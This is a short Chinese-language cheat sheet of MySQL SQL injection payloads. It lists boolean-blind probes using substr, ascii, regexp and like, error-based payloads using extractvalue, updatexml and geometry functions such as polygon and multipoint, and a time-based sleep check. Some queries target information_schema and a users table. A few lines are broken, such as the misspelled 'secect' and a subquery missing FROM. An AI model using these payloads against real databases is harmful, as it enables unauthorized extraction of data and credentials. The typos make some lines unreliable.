注入和绕过常用的函数

1）基于布尔SQL盲注

left(database(),1)>'s'

ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+

ascii(substr((select database()),1,1))=98

ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23

regexp正则注入 select user() regexp '^[a-z]';

select user() like 'ro%'

2）基于报错的SQL盲注

1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】

2）通过floor报错 向下取整

3）+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

4）.geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5）.multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6）.polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7）.multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8）.linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9）.multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10）.exp()select * from test where id=1 and exp(~(select * from(select user())a));

3）延时注入如何来判断？

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)